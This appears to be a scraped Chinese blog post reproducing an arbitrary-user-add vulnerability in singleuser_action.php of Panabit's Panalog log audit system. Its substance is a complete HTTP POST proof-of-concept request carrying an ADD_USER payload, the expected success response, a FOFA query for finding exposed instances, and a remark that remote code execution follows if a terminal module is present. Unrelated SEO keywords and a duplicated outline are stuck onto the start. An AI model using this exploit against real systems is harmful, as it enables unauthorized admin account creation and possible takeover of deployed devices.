电影网站开发库表结构,html网站设计实验报告,seo公司网站建设,哔哩哔哩h5播放器文章目录 panabit日志审计singleuser_action.php任意用户添加漏洞复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 panabit日志审计singleuser_action.php任意用户添加漏洞复现
0x01 前言
免责声明#xff1a;请勿利用文章… 文章目录 panabit日志审计singleuser_action.php任意用户添加漏洞复现0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 panabit日志审计singleuser_action.php任意用户添加漏洞复现
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
panabit日志审计存在 singleuser_action.php 任意用户添加漏洞后台若存在终端命令模块可rce。
0x03 影响版本
panabit日志审计0x04 漏洞环境
FOFA语法app“Panabit-Panalog”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC POST
POST /singleuser_action.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 576
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Connection: close
Content-Type: application/x-www-form-urlencoded
Dnt: 1
Upgrade-Insecure-Requests: 1{ syncInfo: { user: { userId: 119, userName: 119, employeeId: 119, departmentId: 119, departmentName: 119, coporationId: 119, corporationName: 119, userSex: 1, userDuty: 119, userBirthday: 119, userPost: 119, userPostCode: 119, userAlias: 119, userRank: 119, userPhone: 119, userHomeAddress: 119, userMobilePhone: 119, userMailAddress: 119, userMSN: 119, userNt: 119, userCA: 119, userPwd: 119, userClass: 119, parentId: 119, bxlx: 119 },operationType: ADD_USER } }3.复现
发送数据包若回显{“yn”:“yes”,“str”:“OK”}即可登录 使用新建的用户名以及密码登录。
